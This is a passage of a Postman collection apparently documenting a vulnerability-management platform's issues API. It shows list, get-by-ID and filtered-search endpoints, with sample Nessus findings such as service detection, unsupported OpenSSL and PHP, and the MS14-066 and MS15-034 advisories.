\"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7aa\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:29:28\",\n            \"last_seen_date\": \"2017-09-18T03:29:28\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Service Detection\",\n            \"description\": \"\\nNessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cf\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7a8\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:28:27\",\n            \"last_seen_date\": \"2017-09-18T03:28:27\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Backported Security Patch Detection (SSH)\",\n            \"description\": \"\\nSecurity patches may have been 'backported' to the remote SSH server without changing its version number. \\n\\nBanner-based checks have been disabled to avoid false positives. \\n\\nNote that this test is informational only and does not denote any security problem.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c7\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://access.redhat.com/security/updates/backporting/?sc_cid=3093\",\n                    \"title\": \"access.redhat.com\"\n                }\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7a6\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:27:33\",\n            \"last_seen_date\": \"2017-09-18T03:27:33\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Traceroute Information\",\n            \"description\": \"\\nMakes a traceroute to the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d4\",\n            \"port\": 0,\n            \"protocol\": \"udp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7a4\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:29:15\",\n            \"last_seen_date\": \"2017-09-18T03:29:15\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Backported Security Patch Detection (SSH)\",\n            \"description\": \"\\nSecurity patches may have been 'backported' to the remote SSH server without changing its version number. \\n\\nBanner-based checks have been disabled to avoid false positives. \\n\\nNote that this test is informational only and does not denote any security problem.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d0\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://access.redhat.com/security/updates/backporting/?sc_cid=3093\",\n                    \"title\": \"access.redhat.com\"\n                }\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7a2\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:27:40\",\n            \"last_seen_date\": \"2017-09-18T03:27:40\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"HyperText Transfer Protocol (HTTP) Information\",\n            \"description\": \"\\nThis test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... \\n\\nThis test is informational only and does not denote any security problem.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c8\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7a0\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:28:06\",\n            \"last_seen_date\": \"2017-09-18T03:28:06\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"SSH Protocol Versions Supported\",\n            \"description\": \"\\nThis plugin determines the versions of the SSH protocol supported by the remote SSH daemon.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cd\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e79e\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:28:08\",\n            \"last_seen_date\": \"2017-09-18T03:28:08\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"HTTP Server Type and Version\",\n            \"description\": \"\\nThis plugin attempts to determine the type and the version of the   remote web server.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d0\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e79c\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:27:40\",\n            \"last_seen_date\": \"2017-09-18T03:27:40\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Host Fully Qualified Domain Name (FQDN) Resolution\",\n            \"description\": \"\\nNessus was able to resolve the fully qualified domain name (FQDN) of the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4ca\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e79a\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:29:28\",\n            \"last_seen_date\": \"2017-09-18T03:29:28\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Backported Security Patch Detection (PHP)\",\n            \"description\": \"\\nSecurity patches may have been 'backported' to the remote PHP install without changing its version number.\\n\\nBanner-based checks have been disabled to avoid false positives.\\n\\nNote that this test is informational only and does not denote any security problem.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d1\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://access.redhat.com/security/updates/backporting/?sc_cid=3093\",\n                    \"title\": \"access.redhat.com\"\n                }\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e798\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:35:49\",\n            \"last_seen_date\": \"2017-09-18T03:35:49\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 1754,\n    \"totalElements\": 52607,\n    \"last\": false,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 30,\n    \"size\": 30,\n    \"number\": 0\n}"}],"_postman_id":"1eb08383-39ed-492e-8f9a-bfc8d6dec263"},{"name":"Issue by ID","id":"90dc4c13-4395-4dc2-817c-e9dd7bfb5c7e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/issues/<issue_id>","description":"<p>This endpoint allows you to retrieve a single Issue, specifying its ID. If there is no active Issue with the specified ID, the server will respond with a 204: No Content.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","id":"49b34b22-c976-4146-9598-83d2c7c4ab72","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","issues","<issue_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"dd537fcf-a10a-40b5-bb4e-7eaf53f2af49","name":"Try to get a wrong Issue","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/issues/5d03b910c569d50000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 20:26:06 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01gxmxzi0g5pj6s8ar3u8kbd314346.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=425d1c89-a14e-42a2-808b-613ecc87211a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01gxmxzi0g5pj6s8ar3u8kbd314346.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"425d1c89-a14e-42a2-808b-613ecc87211a","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"f5fb46ad-b72b-4516-81b9-a1b801abe1f8","name":"Get an Issue","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/issues/5d03b910c569d5025016e7d2"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Mon, 17 Jun 2019 20:25:15 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01qlplh2f30nld1ad8v53v7t64q4345.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=9285931b-e154-47c7-a101-5a3e75a2e1cb;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01qlplh2f30nld1ad8v53v7t64q4345.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"9285931b-e154-47c7-a101-5a3e75a2e1cb","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"OS Identification\",\n    \"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n    \"severity\": 0,\n    \"asset\": \"5d03b90cc569d5025016e4cb\",\n    \"port\": 0,\n    \"protocol\": \"tcp\",\n    \"status\": \"PENDING\",\n    \"categories\": [\n        \"5b48a6fee12f5edae60cf6e6\"\n    ],\n    \"issue_id\": \"5d03b910c569d5025016e7d2\",\n    \"id_gat_detail\": 2685,\n    \"cvss_v3_score\": 0,\n    \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n    \"creation_date\": \"2017-09-18T03:40:12\",\n    \"last_seen_date\": \"2017-09-18T03:40:12\"\n}"}],"_postman_id":"90dc4c13-4395-4dc2-817c-e9dd7bfb5c7e"},{"name":"Search Issue with given filter","id":"24c9aca3-be72-4ce3-a632-5b455ab5bb39","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"asset_id","value":"List<String>","description":"<p>List of Assets IDs.</p>\n","type":"text"},{"key":"asset_type","value":"List<String>","description":"<p>List of Assets Types: \"HOST\", \"APPLICATION\", \"PERSON\", \"PROCESS\", \"CLOUD\"</p>\n","type":"text"},{"key":"category","value":"List<String>","description":"<p>List of Categories IDs.</p>\n","type":"text"},{"key":"creation_date","value":"Object","description":"<p>Object conatining \"operator\" and \"values\" as shown below.</p>\n","type":"text"},{"key":"creation_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", \"neq\" (not equal) or \"btw\" (between).</p>\n","type":"text"},{"key":"creation_date.values","value":"List<String>","description":"<p>A list containing 1 or 2 dates, depending on the operator. The Date format is: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"cvss_v3_score","value":"List<Float>","description":"<p>List of CVSS v3 Scores.</p>\n","type":"text"},{"key":"due_date","value":"Object","description":"<p>Object conatining \"operator\" and \"values\" as shown below.</p>\n","type":"text"},{"key":"due_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", \"neq\" (not equal) or \"btw\" (between).</p>\n","type":"text"},{"key":"due_date.values","value":"List<String>","description":"<p>A list containing 1 or 2 dates, depending on the operator. The Date format is: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"issue_id","value":"List<String>","description":"<p>List of Issues IDs.</p>\n","type":"text"},{"key":"id_gat_detail","value":"List<Int>","description":"<p>List of GAT IDs.</p>\n","type":"text"},{"key":"last_seen_date","value":"Object","description":"<p>Object conatining \"operator\" and \"values\" as shown below.</p>\n","type":"text"},{"key":"last_seen_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", \"neq\" (not equal) or \"btw\" (between).</p>\n","type":"text"},{"key":"last_seen_date.values","value":"List<String>","description":"<p>A list containing 1 or 2 dates, depending on the operator. The Date format is: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"mitigation","value":"List<String>","description":"<p>List of Mitigation IDs.</p>\n","type":"text"},{"key":"protocol","value":"List<String>","description":"<p>List of Protocols.</p>\n","type":"text"},{"key":"port","value":"List<Int>","description":"<p>List of Port Numbers.</p>\n","type":"text"},{"key":"recommendation","value":"List<String>","description":"<p>List of Recommendations IDs.</p>\n","type":"text"},{"key":"responsible","value":"List<String>","description":"<p>List of Users IDs.</p>\n","type":"text"},{"key":"root_cause","value":"List<String>","description":"<p>List of Root Causes IDs.</p>\n","type":"text"},{"key":"severity","value":"List<Int>","description":"<p>List of Issue Severities ranging from 0 to 4.</p>\n","type":"text"},{"key":"source_scan","value":"List<String>","description":"<p>List of Sources: \"MANUAL\", \"NESSUS\", \"ACUNETIX\", \"ARACHNI\", \"QUALYS\", \"CUSTOM_PARSER\", \"NESSUS_AUDIT\", \"TENABLEIO\", \"NEXPOSE\", \"OPENVAS\", \"FORTIFY\", \"LUCY\", \"BURP\", \"APPSCAN\", \"NETSPAKER\", \"NIKTO\", \"WEBINSPECT\", \"W3AF\", \"LEGACY\", \"NMAP\", \"HIBP\", \"ALIENVAULT\"</p>\n","type":"text"},{"key":"status","value":"List<String>","description":"<p>List of Statuses: \"PENDING\", \"REOPENED\", \"RETEST\", \"TREATMENT\", \"FIXED\", \"ACCEPT\", \"NONEXISTENT\".</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>List of Tags IDs.</p>\n","type":"text"},{"key":"test","value":"List<String>","description":"<p>List of Test IDs.</p>\n","type":"text"},{"key":"title","value":"List<String>","description":"<p>List of Issue Titles.</p>\n","type":"text"},{"key":"update_date","value":"Object","description":"<p>Object conatining \"operator\" and \"values\" as shown below.</p>\n","type":"text"},{"key":"update_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", \"neq\" (not equal) or \"btw\" (between).</p>\n","type":"text"},{"key":"update_date.values","value":"List<String>","description":"<p>A list containing 1 or 2 dates, depending on the operator. The Date format is: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"watcher","value":"List<String>","description":"<p>List of Users IDs.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/issues?size=30&page=0","description":"<p>This endpoint allows you to search for Issues based on a given filter. The fields are combined with an <strong>OR</strong> operator. Therefore, using eg. \"status: [PENDING, REOPENED]\" and \"port: [443]\" will retrieve all Issues with statuses \"PENDING\" and \"REOPENED\" which occurs on port 443.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","id":"49b34b22-c976-4146-9598-83d2c7c4ab72","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","issues"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"29e5daa9-e137-4609-af00-7a03b4e162be","name":"Find all Open Critical Issues","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"status\": [\"PENDING\", \"TREATMENT\", \"RETEST\", \"REOPENED\"],\n\t\"severity\": [4]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/issues?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","issues"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Mon, 17 Jun 2019 21:09:05 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01eialrtrtsf0n191ofnbs4or2p5030.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0u5agvmpv00761rdc1emt15cjc5040.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=2abdc3a8-befc-4008-846d-e3e6636e4a00;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0u5agvmpv00761rdc1emt15cjc5040.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"2abdc3a8-befc-4008-846d-e3e6636e4a00","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"language\": \"en\",\n            \"title\": \"OpenSSL Unsupported\",\n            \"description\": \"\\nAccording to its banner, the remote web server is running a version of OpenSSL that is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5d024cf1c569d5025016dc31\",\n            \"port\": 443,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5cec2354c569d52c0f2e34e9\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"http://www.nessus.org/u?4d55548d\",\n                    \"title\": \"www.nessus.org\"\n                },\n                {\n                    \"url\": \"https://www.openssl.org/policies/releasestrat.html\\n\",\n                    \"title\": \"www.openssl.org\"\n                }\n            ],\n            \"issue_id\": \"5d024cf8c569d5025016e090\",\n            \"id_gat_detail\": 2685,\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T02:41:58\",\n            \"last_seen_date\": \"2017-09-18T02:41:58\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"PHP Unsupported Version Detection\",\n            \"description\": \"\\nAccording to its version, the installation of PHP on the remote host is no longer supported.\\n\\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.\",\n            \"severity\": 4,\n            \"asset\": \"5d024cf1c569d5025016dc31\",\n            \"port\": 443,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5cec2331c569d52c0f2e26d1\"\n            ],\n            \"categories\": [\n                \"5b17e930e12f5e057c39fa67\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"http://php.net/eol.php\\n\",\n                    \"title\": \"php.net\"\n                },\n                {\n                    \"url\": \"https://wiki.php.net/rfc/releaseprocess\",\n                    \"title\": \"wiki.php.net\"\n                }\n            ],\n            \"issue_id\": \"5d024cf7c569d5025016dfa0\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T02:41:58\",\n            \"last_seen_date\": \"2017-09-18T02:41:58\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (uncredentialed check)\",\n            \"description\": \"\\nThe remote Windows host is affected by a remote code execution vulnerability due to improper processing of packets by the Secure Channel (Schannel) security package. An attacker can exploit this issue by sending specially crafted packets to a Windows server.\\n\\nNote that this plugin sends a client Certificate TLS handshake message followed by a CertificateVerify message. Some Windows hosts will close the connection upon receiving a client certificate for which it did not ask for with a CertificateRequest message. In this case, the plugin cannot proceed to detect the vulnerability as the CertificateVerify message cannot be sent.\",\n            \"severity\": 4,\n            \"asset\": \"5d024cf1c569d5025016dc28\",\n            \"port\": 443,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5abbd513e12f5e05704bf9ad\"\n            ],\n            \"categories\": [\n                \"5b43678ae12f5e057c3a88c0\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://technet.microsoft.com/library/security/ms14-066\",\n                    \"title\": \"technet.microsoft.com\"\n                }\n            ],\n            \"issue_id\": \"5d024cf7c569d5025016df24\",\n            \"cvss_v3_score\": 9.760161495000002,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T02:50:24\",\n            \"last_seen_date\": \"2017-09-18T02:50:24\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)\",\n            \"description\": \"\\nThe version of Windows running on the remote host is affected by an integer overflow condition in the HTTP protocol stack (HTTP.sys) due to improper parsing of crafted HTTP requests. An unauthenticated, remote attacker can exploit this to execute arbitrary code with System privileges.\",\n            \"severity\": 4,\n            \"asset\": \"5d024cf1c569d5025016dc28\",\n            \"port\": 443,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5d024cf3c569d5025016dcbb\"\n            ],\n            \"categories\": [\n                \"5b43678ae12f5e057c3a88c0\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-034\",\n                    \"title\": \"docs.microsoft.com\"\n                },\n                {\n                    \"url\": \"https://technet.microsoft.com/en-us/library/security/MS15-034\",\n                    \"title\": \"technet.microsoft.com\"\n                }\n            ],\n            \"issue_id\": \"5d024cf7c569d5025016dd90\",\n            \"cvss_v3_score\": 